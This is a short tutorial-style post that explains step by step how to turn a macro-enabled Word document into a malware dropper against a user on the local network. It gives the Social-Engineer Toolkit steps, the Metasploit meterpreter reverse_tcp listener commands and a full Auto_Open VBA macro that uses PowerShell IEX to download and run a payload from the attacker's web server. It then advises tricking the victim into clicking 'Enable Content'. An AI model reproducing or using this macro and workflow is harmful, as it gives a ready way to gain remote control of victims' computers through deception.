MS Word Macro Exploit

1 minute read

Description:

The following is an article I read on generating an exploit for MS Word and using it to attack a LAN user.

What you will need:
Microsoft Word
The Social-Engineer Toolkit (preinstalled on Kali)
Apache web server (preinstalled on Kali)
The Metasploit Framework (also preinstalled on Kali)

To Resolve:

  1. Create the payload. On Kali, open terminal and type: setoolkit

  2. Type “1” then “9” then “1” for powershell alphanumeric shellcode injector”.

  3. Fill in the LHOST variable which is your IP. This attack assumes you are on the local subnet of your victim. Then fill out the LPORT which is the port you want the attack to come back on. People typically keep this at “4444” but you can choose whatever. Type “no” to the start listener now.

  4. Now move the payload to your web server:

mv /root/.set/reports/powershell/x86_powershell_injection.txt /var/www/html/payload.txt
service apache2 start

  1. Now we setup the listener:

msfconsole
use multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.10.200
set LPORT 4444
exploit

  1. Now we need to add the command to our MS Word document:

a. Open up a blank MS Word doc and name is something like attack.docm and make sure that it is macro-enabled.

b. Go to the “View” tab – Macros – “Auto_Open” / attack.docm – Create – (paste in the following:)

Sub Auto_Open()
Dim exec As String
exec = “powershell.exe “”IEX ((new-object net.webclient).downloadstring(‘http://10.0.0.13/payload.txt’))”””
Shell (exec)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()

c. At this point, you may want to obfuscate the code, but many people don’t even know how to get to the macro’s section of Word, muchless what macro’s even are so we will skip this step. If you want to know, read the article in the reference (the source).

d. Save the document

  1. Now we need to convince the victim that the document is safe. The article references word trickery such as “to open the secure document, click “Enable Content””.

References:

http://null-byte.wonderhowto.com/how-to/create-obfuscate-virus-inside-microsoft-word-document-0167780/